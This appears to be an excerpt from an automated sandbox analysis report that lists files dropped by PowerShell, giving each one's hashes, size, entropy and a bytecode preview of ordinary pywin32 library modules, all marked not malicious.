                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.e.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d Z'd!Z(d"Z)d#Z*d$Z+d%Z,d.Z-d&Z.d'Z/d.Z0d.Z1d.Z2d.Z3d.Z4e4Z5e,e+B.e*B.e)B.Z6d.Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd(ZEd.ZFd.ZGd)ZHd*ZId.ZJd+ZKd.ZLd.ZMd.ZNd.ZOd.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd,ZYd.ZZd$Z[d#Z\d.Z]d.Z^d.Z_d.Z`d.Zad.Zbd%Zcd.Zdd.Zed(Zfd.ZgedZheeZiefZjd.Zkd.Zld(Zme;Zne<Zoe=Zpd.Zqd.Zrd.ZseresB.Ztd.Zud.Zvd(Zwd.Zxd.ZyeyZzd)Z{e{Z|d*Z}d.Z~d+Z.d-Z.d.Z.d/Z.d0Z.d.Z.d.Z.d1Z.d2Z.d3Z.d4Z.d5Z.d6Z.d7Z.d,Z.d8Z.d.Z.d9Z.d:Z.d;Z.d<Z.d=Z.d>Z.d?Z.d@Z.dAZ.dBZ.dCZ.dDZ.dEZ.dFZ.dGZ.dHZ.dIZ.dJZ.dKZ.dLZ.dMZ.dNZ.dOZ.dPZ.dQZ.dRZ.dSZ.dTZ.dUZ.dVZ.d.Z.dWZ.dXZ.dYZ.d.Z.dZZ.d[Z.d\Z.d]Z.d^Z.d_Z.d`Z.d.Z.daZ.dbZ.dcZ.ddZ.deZ.dfZ.dgZ.dhZ.diZ.djZ.dkZ.dlZ.dmZ.dnZ.doZ.euZ.e.Z.dpZ.d.Z.d.Z.d(Z.d.Z.d.Z.d)Z.d*Z.d.Z.d+Z.dqZ.d-Z.d.Z.d/Z.drZ.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.e.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18545
                                                                                                                                                                                                            Entropy (8bit):5.599807355495357
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:OfgoEErLRhOrGm7rDZZUqSk/bWcV+Mdkbpix/PX+q4Oowc/cVZfAI6:JoXLRuZuLk/ddpQOowc/d
                                                                                                                                                                                                            MD5:07D5030AFE9D9DC13DB34D9636FC1DDA
                                                                                                                                                                                                            SHA1:72ED1F341A26A7D0DD2ED25028308E4D3689AAD2
                                                                                                                                                                                                            SHA-256:95815093F6E174B3A50C5CBF8A58551859BE0F73B72B0650DCC312B5043D71C5
                                                                                                                                                                                                            SHA-512:2137F96337495B5FE0FE8157199D92700172285A989D8D02DF25F13F9380E7E3CFCF6A583477094B7282369F704381E45BD4EE44D1CAECCE1F22C6FB2EF23F1C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.J.......................@...s....d.Z.d.Z.e.Z.e.Z.e.d...Z.e.d...Z.d.Z.d.Z.e.d...e...Z.e.d...e...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.e.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(d.Z)d.Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d.Z8d.Z9d.Z:e8e9B.e:B.Z;e6e7B.e8B.e9B.e:B.Z<d.Z=d.Z>e0e1B.e3B.e2B.e4B.e5B.e<B.e=B.e>B.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd.ZGd ZHd.ZIeFeGB.eHB.eIB.ZJd.ZKd.ZLd.ZMd!ZNd.ZOd!ZPd ZQd"ZRd#ZSd.ZTd.ZUd$ZVd%ZWd&ZXd.ZYd'ZZd.Z[d.Z\d.Z]d(Z^d)Z_d*Z`d.Zad.Zbd+Zcd,Zdd.Zed-Zfd.Zgd/Zhd/Zid0Zje(eO..Zke(eP..Zle(eQ..Zme(eR..Zne(eS..Zoe(eT..Zpe(eU..Zqe(eV..Zre(eW..Zse(eX..Zte(eY..Zue(eZ..Zve(e[..Zwe(e\..Zxe(e]..Zye(e^..Zze(e_..Z{e(e`..Z|e(ea..Z}e(eb..Z~e(ec..Z.e(ed..Z.e(ee..Z.e(ef..Z.e(eg..Z.e(ej..Z.d1Z.d.Z.e.d...Z.d!Z.d.Z.d.Z.d.Z.e.Z.d#Z.d"Z.d.Z.d.Z.d.Z.d.Z.d!Z.d.Z.d.Z.d.Z.d!Z.d Z.d"Z.d#Z.d.Z.d.Z.d$Z.d%Z.d&Z.d.Z.e(e...Z.e(e...Z.e(e...Z.e(e...Z.e(e...Z.e(e...Z.e(e...Z.e(e...Z.e(e...Z.d2Z.d.Z.d.Z.d.Z.d!Z.e(e...Z.e(e...Z.e(
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20872
                                                                                                                                                                                                            Entropy (8bit):5.107084177461381
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:TpnrUhmzoJanZjgFkYX0DwrN9yrkdhnH52g1fdLXQR7mnRizMhA/JlCn1flz5x7d:TprU0zoJeZYWI9yrknnH5h1fdXQRgozu
                                                                                                                                                                                                            MD5:DA25CB052124A1BE81860C6D3BBC7E4B
                                                                                                                                                                                                            SHA1:440CE799D9619BB877B1A575BDD3779177B88593
                                                                                                                                                                                                            SHA-256:E31C9798EB4C7A9D22BAAB2D24A0A40813D63B6EEA69EB548B983CE5F9753381
                                                                                                                                                                                                            SHA-512:8A8927A619BE17B547E784450CD85E5C13D4CA7736375BB499072271871B28C39A5C905468970662F98E254396BA23CCF19F18C38FE4677DD792BDC26EEFD600
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.].......................@...s\...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d...Z.d.S.).a.....Performance Data Helper (PDH) Query Classes..Wrapper classes for end-users and high-level access to the PDH query.mechanisms. PDH is a win32-specific mechanism for accessing the.performance data made available by the system. The Python for Windows.PDH module does not implement the "Registry" interface, implementing.the more straightforward Query-based mechanism...The basic idea of a PDH Query is an object which can query the system.about the status of any number of "counters." The counters are paths.to a particular piece of performance data. For instance, the path.'\Memory\Available Bytes' describes just about exactly what it says.it does, the amount of free memory on the default computer expressed.in Bytes. These paths can be considerably more complex than this,.but part of the point of this wrapper module is to hide that.complexity fro
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4779
                                                                                                                                                                                                            Entropy (8bit):5.71818964099229
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CYLuAYsfpaGZTHeKcPbmLag+Sh5pusfZQbUuVHFHI7DX1urYZcd2WfInYQzRuMS:CXAlzrVObmLASXofUuVHFHI/1ur+s2OX
                                                                                                                                                                                                            MD5:541EBB7BDA521122C121E9C3C113E251
                                                                                                                                                                                                            SHA1:893401D8AFB8E77A03F429017ED4BA2F55B59A25
                                                                                                                                                                                                            SHA-256:0E44413A13C7175985595DCF98DFD748004D7DE1F125D2CC89E2806094E5F505
                                                                                                                                                                                                            SHA-512:0E4985D6DB45AFAA533C44D59A43B948D196C64567ABCD3970B0815560E04A5CECABB43797ABD35763AC8273A29E494638759877D2B6790347D4392E450EC666
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....U.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.e.j.Z.i.Z.d.e.d.<.d.d.d...Z.d.d.e.j.d.f.d.d...Z.d.d.e.j.d.d.f.d.d...Z.d.d...Z.d.d...Z.e.d.e.j.f.d.d...Z.e.d.k.rne.....e.d...Z.e.d.e.d.e.d.......e.d.e.e.d...e.d.........e.d.....e.....d.S.d.S.).a....Utilities for the win32 Performance Data Helper module..Example:. To get a single bit of data:. >>> import win32pdhutil. >>> win32pdhutil.GetPerformanceAttributes("Memory", "Available Bytes"). 6053888. >>> win32pdhutil.FindPerformanceAttributesByName("python", counter="Virtual Bytes"). [22278144].. First example returns data which is not associated with any specific instance... The second example reads data for a specific instance - hence the list return -. it would return one result for each instance of Python running... In general, it can be tricky finding exactly the "name" of the data you wish to query.. Although you can use <om win32pdh.EnumObjectItems>(None,None,(eg)"Memory", -1) to do this,. the
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15477
                                                                                                                                                                                                            Entropy (8bit):5.374574012376047
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:JkHy3RRlsR8bjr1GSPY+sBNvwOz21M7AWps4Qydbj:6ShRlsCbjyDnpWyAgs41dX
                                                                                                                                                                                                            MD5:9CD6EFA9A6C64867C234B86DD5AE0A32
                                                                                                                                                                                                            SHA1:85EDCE6CF59FB79FB1B8F00D657DB23712E68F90
                                                                                                                                                                                                            SHA-256:02C640035C9EDC0AC3B59A9776E7F2B72AA451FBC8124697FFC117AA5775A051
                                                                                                                                                                                                            SHA-512:7C50ACB466D2B7CA0F2E16C4F99500A05ECCB80A8ECD9EB3C58DED0B760E4130E259061241D8BA8BA41C18C1F01A4AA314273D27595C90EA64B21B9D5C48B333
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g;W.......................@...sB...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.e.j.e.j.B.e.j.e.j.e.j.e.j.B.e.j.e.j.e.j.e.j.e.j.d...Z.e.j.e.j.B.Z.d.Z.G.d.d...d...Z.G.d.d...d...Z.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d)d.d...Z d)d.d...Z!e"d.k...r.e#e.j$..d.k.r.e%e.....e%....e%d.....e%d ....d.S.e.j$d...Z&d!e.j$v.r.d"e._'e%d#e&......e e&..Z(e(j).*..D.].\.Z+Z,e%d$e+e#e,..f.......e...e,....e%....q.e(j-.*..D.].\.Z+Z.e%d%e+..d&e.j/........e%....q.e(j0.*..D.].\.Z+Z.e%d'e+..d&e.........e%....q.e(j1.*..D.].\.Z+Z.e%d(e+..d&e.........e%......q.d.S.d.S.)*zs.This is a parser for Windows .rc files, which are text files which define.dialogs and other Windows UI resources.......)...annotationsNz.Adam Walkerz.0.11........................Z.RichEdit20A)...DEFPUSHBUTTON..PUSHBUTTONZ.Button..GROUPBOXZ.Static..CTEXT..RTEXT..LTEXT..LISTBOX..SCROLLBAR..COMBOBOX..EDITTEXT..ICONZ.RICHEDIT).r....r....r....r....r....r....r....r....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21304
                                                                                                                                                                                                            Entropy (8bit):5.661057543678668
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:TCI/SwWKNZc5/L6zh8vU8/TGv5IlkYYmZ8zks39OdwhvJNPWM7cZoEOOLDP/xs6d:GIqwfZc5/LYGzN++Z8zjkehRNPWM7cZ1
                                                                                                                                                                                                            MD5:E151228433D2FEBA90720F6C7989ECFF
                                                                                                                                                                                                            SHA1:724BE00CCCF8E8595BD6E43A10E7B554E4613868
                                                                                                                                                                                                            SHA-256:81458920AA33B9872468A41646FE2DA27052CD5887EFBF9132BDAC25A270C393
                                                                                                                                                                                                            SHA-512:E069EA50606B02832EED05DBCE3C1278CC967AD347194D1C24FF3ECB3C05D03FF61B8F7A1578C832868A2E3B5AE5C5A9026E8B0CB94458B45B970C6880364867
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.Z.d<d.d...Z.d.d...Z.d.d...Z.d.d...Z.d<d.d...Z.d.d...Z.........................d=d.d...Z...........................d>d.d...Z.d.d...Z.d.d...Z.d<d.d...Z.d.d...Z.d<d.d...Z.d.d...Z.d.d...Z.d<d d!..Z.d?d#d$..Z.d@d%d&..Z.d<d'd(..Z.dAd)d*..Z.dBd+d,..Z d-d...Z!g.f.d/d0..Z"d<d1d2..Z#d<d3d4..Z$d5d6..Z%.....7..dCd8d9..Z&G.d:d;..d;..Z'd.S.)D.....Nc....................C...s....|.s.t.t.d...r.t.j.S.|.r.t.j...|...r.t...|...S.d.t.j.j.v.r.d.n.d.}.d.|...d...}.t.j...|...r2t...|...S.t.j...t.j.|...}.t.j...t.j...t.j...|...}.t.j...|...r}t.d.|...d.|...d.......z.t...|.|.t.j.....W.n...t.j.y|..}...z.t.d.|...d.......W.Y.d.}.~.n.d.}.~.w.w.t.j...|...s.t.d.|...d.......t...t.j...}.d.t.j.j...t.j.j...|...d...}.t.j...t.j...|...|...}.t.j...|...s.t.d.t.j...d.|...d.......t...t.j.|.....|.S.).N..frozenz._d.pyd.._d..Z.pythonservicez..exez.moving host exe 'z.' -> '..'z.Failed to move host exe 'z.Can't find '..p
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25491
                                                                                                                                                                                                            Entropy (8bit):5.376355616044183
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Y5LwoDejxkgVfxCRen0qMrbCzjGdAhQxwxYxIldqapNIUfsMSWPks5gcokIkl:Y5C3fk0ncbcjQiOwx7/zzfsIkA3Ikl
                                                                                                                                                                                                            MD5:34ECC6918CFB836A873473DDB1D6AD75
                                                                                                                                                                                                            SHA1:8E9B09B7A04EA95CAA532DFD6CFDD400D41716EB
                                                                                                                                                                                                            SHA-256:1757C04B21B158682B9AFF9DE6482A3937B01F95DE9C2B88A45FC68A4504790E
                                                                                                                                                                                                            SHA-512:376CA4F322760D72580C9F86BF428501D726454E266B64B65EF826687BC457F87D5D34C822BE7B371B51A359E649C4C7078664C22A4357750D6B9C27DECA4D4B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s,...d.d.l.m.Z.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.Z.e...e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.e.f.....Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.e...Z.d.d...Z G.d.d...d.e!..Z"d.S.) .....)...annotationsN)...count)...Dictz#Jason R. Coombs <jaraco@jaraco.com>c....................@...s:...e.Z.d.Z.U.g.Z.d.e.d.<.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._SimpleStructz.list[tuple[str, type]].._fields_c....................O...s....t.|.j...D.]E\.}.\.}.}.d.}.|.t.|...k.r.|.|...}.|.|.v.r.|.|...}.|.d.u.r,t.|.t...s+|.f.}.n.d.}.t.|...d.k.r@t.|.d...|...r@|.d...}.n.|.|...}.t.|.|.|.....q.d.S.).N.......r....)...enumerater......len..isinstance..tuple..setattr)...self..args..kw..i..name..typZ.def_argZ.def_valr....r.....nC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/lib/win32timezone.py..__init__....s
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):940
                                                                                                                                                                                                            Entropy (8bit):5.159896791528087
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:Cs/P3ClGR987IIUYcwwXc5EGDXtDz++T2liloqV9VPr86qqMZ4fbvqx/:CsBx39Xc5EMXR92lin41q1qJ
                                                                                                                                                                                                            MD5:7D62FF09951616F3C76754CF83E5FB93
                                                                                                                                                                                                            SHA1:1E9CFF0AE95728446FC33D386376AF4487E7A8EA
                                                                                                                                                                                                            SHA-256:72629964A6499D69A29271867C76F1B2C456EB20C081AA746A56726729E130CB
                                                                                                                                                                                                            SHA-512:ECDADB3F38539017B22F63DF4919F1A4E46F0C7FBC6E0C2907FB0DE9424F012C6A28A296F74D100C5F758C17FDF82F189A8E80F0608396995B703E1D6A6309BA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g}........................@...s4...d.d.l.Z.d.d...Z.d.d...Z.e.d.k.r.e.....d.S.e.....d.S.)......Nc....................C...sl...d.d.l.}.z.d.d.l.}.|...d.....W.n.......Y.t.......t.d.....z...|.j...t...d.......q...t.y5......t.d.....Y.d.S.w.).Nr....z.Python Trace Collectorz!Collecting Python Trace Output........i....z.Ctrl+C)...sys..win32api..SetConsoleTitle..win32traceZ.InitRead..print..stdout..writeZ.blockingread..KeyboardInterrupt).r....r......r.....oC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/lib/win32traceutil.py..RunAsCollector....s..................................r....c....................C...s*...t.......z.t.d.....W.n.......Y.t.......d.S.).Nz1Redirecting output to win32trace remote collector).r....Z.InitWriter....Z.setprintr....r....r....r......SetupForPrint/...s................r......__main__).r....r....r......__name__r....r....r....r......<module>....s................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6083
                                                                                                                                                                                                            Entropy (8bit):5.511585016304117
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Cn1eNk88InrqcP/R7r3NPCsrQ+UnFVRGolllbD7L9YfiWTiJ4FhEXyS7qggP0jXO:CQNk8xnucx7r3QoQ/L0yllP7L96TGChJ
                                                                                                                                                                                                            MD5:A93DE50E6D0F3121740BFD8FCD4647DB
                                                                                                                                                                                                            SHA1:898C7FF6C54DCF9C7F0170B188A9B6FDD4F61797
                                                                                                                                                                                                            SHA-256:895B43B9C55A68AF3F3C107E459DA2255CF8F89CFF8954225EC78F8000F4248A
                                                                                                                                                                                                            SHA-512:CA8DCFDF2A415678A42D1DCD25A57E5468AB55975036338E4AFC07373122BA353655D45C45D2C09009618C2C0497CB254F2E27F2EAC5D889D3110FDAF2303EDA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g0........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.dMd.d...Z.d.d...Z.dNd.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.dMd!d"..Z.d#d$..Z.e.d%k.r.e.j.d&e.d'..Z.e.j.d(d)d*d+d,d-d.....e.j.d/d0d1d2d3....e.j.d/d4d5d6....e.j.d/d7d8d6....e.j.d/d9d:d6....e.j.d/d;d<d6....e.j.d/d=d>d6....e.j.d/d?d@d6....e.j.d/dAdBd6....e.j.d/dCdDdEdF....e.j.d/dGdHdIdF....e.j.d/dJdKd6....e.....\.Z Z!e!s.e.."dL....e!D.].Z#e...e#..D.].Z$e.e$e ....q.q.d.S.d.S.)Oz.Stamp a Win32 binary with version information......N)...BeginUpdateResource..EndUpdateResource..UpdateResourcei....i.....?...i..........c....................C........|.r.d.S.d.S.).N.....r......)...debugr....r.....nC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/lib/win32verstamp.py..file_flags...............r....c....................C...r....).N..........r....)...is_dllr....r....r......file_type....r....r....r....c........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):110026
                                                                                                                                                                                                            Entropy (8bit):5.540532232788028
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:YXHr+WkCiLwob3461QcLHHsc12IorcPqC56e39H4Set6nV9m9PQ9eR:0gW+4613Lnsc12Iorde39H4Set2Vu7
                                                                                                                                                                                                            MD5:CDC06EB084FB5C99349B68E0A09F5E6F
                                                                                                                                                                                                            SHA1:26C622EEE55CC80A5EE2999E27C6087A56413236
                                                                                                                                                                                                            SHA-256:465A22ED5E7C87CA99449DF3C014DA6402B236AEF522FBB0F3CDA077D19861C8
                                                                                                                                                                                                            SHA-512:F8BB96790BDD6A7E5CF823193DE8B4ADB2075EF6A84B367C1EAE9BC14894146F52461C9B74B9EC79113A6D6A2FB2343F1C8758215589245A0E0A60BB8214403A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gE........................@...s.Y..d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d Z!d!Z"d"Z#d#Z$d$Z%d%Z&d&Z'd'Z(d(Z)d)Z*d*Z+d+Z,d,Z-d-Z.d.Z/d/Z0d0Z1d.Z2d.Z3d.Z4d.Z5d.Z6d'Z7d.Z8d.Z9d1Z:d2Z;d.Z<d.Z=d.Z>d.Z?d-Z@d.ZAd.ZBd.ZCd.ZDd.ZEd*ZFd0ZGd.ZHd/ZId&ZJd.ZKd.ZLd.ZMd!ZNd+ZOd3ZPd4ZQd5ZRd6ZSd%ZTd.ZUd)ZVd.ZWd.ZXd"ZYd.ZZd#Z[d.Z\d.Z]d Z^d,Z_d7Z`d8Zad9Zbd:Zcd;Zdd<Zed=Zfd>Zgd?Zhd@ZidAZjdBZkdCZldDZmdEZndFZodGZpdHZqd.ZrdIZsdJZtdKZudLZvdMZwdNZxdOZydPZzdQZ{dRZ|dSZ}dTZ~dUZ.dVZ.dWZ.dXZ.dYZ.dZZ.d[Z.d\Z.d]Z.d^Z.d_Z.d`Z.daZ.dbZ.dcZ.ddZ.deZ.dfZ.dgZ.dhZ.diZ.djZ.dkZ.dlZ.dmZ.dnZ.doZ.dpZ.dqZ.drZ.dsZ.dtZ.duZ.dvZ.dwZ.dxZ.dyZ.dzZ.d{Z.d|Z.d}Z.d~Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24693
                                                                                                                                                                                                            Entropy (8bit):5.782294211904835
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:/QgiKYtRbkyXssCcw0/KUJc2zzI9sG5JEqbcFDYkmq6t9IHGoo4x4:/n4f/FCcw0/J1A9FJEDYkmZAHGj4x4
                                                                                                                                                                                                            MD5:63DB1F66F1376323C8DC05219EC15A77
                                                                                                                                                                                                            SHA1:7A720AD64685B74D39BB43E9DF8E18BAFE6524E9
                                                                                                                                                                                                            SHA-256:920EBAB3288AE63569A55F60886D1F6808212ECFA634D7D740AC380D361C0904
                                                                                                                                                                                                            SHA-512:89DAAB9729F29B7DA9C217D73204752FEA295D78FBC3C851EBAC33E41CA16436FDF49D969BB4670970CD911C288E88DA849E42B6F27A8264186A41B26E854D96
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gf........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z.d!Z d"Z!d#Z"d$Z#d%Z$d&Z%d'Z&d(Z'd)Z(d*Z)d+Z*d,Z+d-Z,d.Z-d/Z.d0Z/d1Z0d2Z1d3Z2d4Z3d5Z4d6Z5d7Z6d8Z7d9Z8d:Z9d;Z:d<Z;d=Z<d>Z=d?Z>d@Z?dAZ@d.ZAd.ZBd.ZCd.ZDeBZEeCZFd.ZGeGZHd.ZId.ZJe2ZKd.ZLd.ZMd.ZNd.ZOd.ZPd&ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXdBZYdCZZe.Z[d.Z\d.Z]d.Z^d.Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.ZhdDZidEZjdFZkdGZldHZmd.ZndIZodJZpdKZqdLZrd.Zsd.Ztd.Zud.Zvd.Zwd.Zxd.Zyd.ZzdMZ{dNZ|dOZ}dPZ~dQZ.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.dRZ.dSZ.dTZ.dUZ.dUZ.dUZ.dUZ.dVZ.dWZ.dXZ.dYZ.dZZ.d[Z.d\Z.d]Z.d^Z.d_Z.d`Z.e5Z.d*Z.d.Z.d.Z.d.Z.d.Z.d&Z.d.Z.d.Z.d.Z.d.Z.d.Z.d&Z.daZ.dHZ.dBZ.dUZ.dbZ.dcZ.ddZ.deZ.dfZ.dgZ.dhZ.diZ.djZ.dkZ.dlZ.dmZ.dnZ.doZ.dpZ.dqZ.drZ.dsZ.dtZ.dCZ.duZ.dvZ.dwZ.dxZ.dyZ.dzZ.d{Z.d|Z.d}Z.d~Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d&Z.daZ.ddZ.deZ.dgZ.dnZ.doZ.dsZ.dtZ.d.Z.d.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38879
                                                                                                                                                                                                            Entropy (8bit):5.646756790124009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:mJT4NlUFV73HhNZmcoUxP70/w7FzxtJ77QDwb5HnNg4YfekHE316AwQOI:muNlwTSGFzxtJPJu4Lc3QOI
                                                                                                                                                                                                            MD5:FBB7FD96C2E7308F5737063629CD3538
                                                                                                                                                                                                            SHA1:0ABA1B2A7A260DF6958E9B2AE860632754C30F41
                                                                                                                                                                                                            SHA-256:638C63209BE53A178808CFAC34716C9149F126812E84BB6AD2DD0FB545058D09
                                                                                                                                                                                                            SHA-512:689BBC068B2714AE17B6579094B7C8B5B0AAE83A451C2BE55E676F79A54253EC97A3E72AEEF3B360604F527B1502AE6AC0F1BC8BB67DB306B8053C21179DE166
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
